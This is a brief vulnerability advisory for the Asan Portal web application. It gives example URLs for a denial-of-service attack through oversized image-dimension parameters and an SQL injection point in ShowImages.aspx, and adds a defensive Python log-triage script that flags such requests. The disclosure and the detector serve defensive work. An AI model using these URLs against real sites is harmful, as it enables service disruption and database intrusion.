Asan Portal (IdehPardaz) Multiple Vulnerabilities



#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Asan Portal
# Vendor: http://iptech.ir/default.aspx?id=130
#################################################################
Vulnerability:

######################
# Denial of Service:
######################
http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx?id=922&FieldName=Content_Image1&w=1000&h=1000
Setting large values for the width (w) and height (h) parameters makes it possible to create a large load on the server.

######################
# SQL Injection:
######################
http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75

#################################################################
# Discovered By: Securitylab.ir
# Website: http://Securitylab.ir
# Contacts: info[at]securitylab.ir
###################################################################
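
Added example, not part of the original advisory and not vendor code: a log-triage check that flags requests to ShowImages.aspx whose w/h are oversized or whose id, w or h is not a plain integer. The 512-pixel limit (MAX_DIM) and the function names are assumptions; the handler path and parameter names come from the advisory, and the sample URLs are constructed from its two examples.

```python
from urllib.parse import urlsplit, parse_qsl

# Handler path and parameter names (id, w, h) are taken from the advisory.
HANDLER = "/modules/administrative/showphotos/showimages.aspx"
MAX_DIM = 512  # assumption: largest image edge the site legitimately serves


def is_plain_int(value):
    """True only for a non-empty string of ASCII digits."""
    return value.isascii() and value.isdigit()


def audit_request(url):
    """Return findings for one requested URL; an empty list means nothing to flag."""
    parts = urlsplit(url)
    # Collapse repeated slashes and ignore case before matching the handler path.
    path = "/" + "/".join(seg for seg in parts.path.split("/") if seg)
    if path.lower() != HANDLER:
        return []
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        name = name.lower()  # ASP.NET reads query-string keys case-insensitively
        if name not in ("id", "w", "h"):
            continue
        if not is_plain_int(value):
            findings.append(f"{name}: not a plain integer")
        # Length check first so a huge digit string never reaches int().
        elif name != "id" and (len(value) > 6 or int(value) > MAX_DIM):
            findings.append(f"{name}: exceeds {MAX_DIM}")
    return findings


def audit_all(urls):
    """Map each flagged URL to its findings; clean URLs are omitted."""
    return {u: f for u in urls if (f := audit_request(u))}


# Constructed sample: the advisory's two URLs plus one ordinary thumbnail request.
BASE = "http://site.ir/Modules/Administrative/ShowPhotos/ShowImages.aspx"
SAMPLE = [
    BASE + "?id=922&FieldName=Content_Image1&w=1000&h=1000",
    "http://site.ir//Modules/Administrative/ShowPhotos/ShowImages.aspx"
    "?FieldName=Content_Image1&h=75&id=%24[SQL Injection]&w=75",
    BASE + "?id=922&FieldName=Content_Image1&w=75&h=75",
]

if __name__ == "__main__":
    for url, findings in audit_all(SAMPLE).items():
        print(findings, url)
```

The same two rules (integer-only id, bounded w and h) are what the handler itself should enforce before it queries the database or resizes an image.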


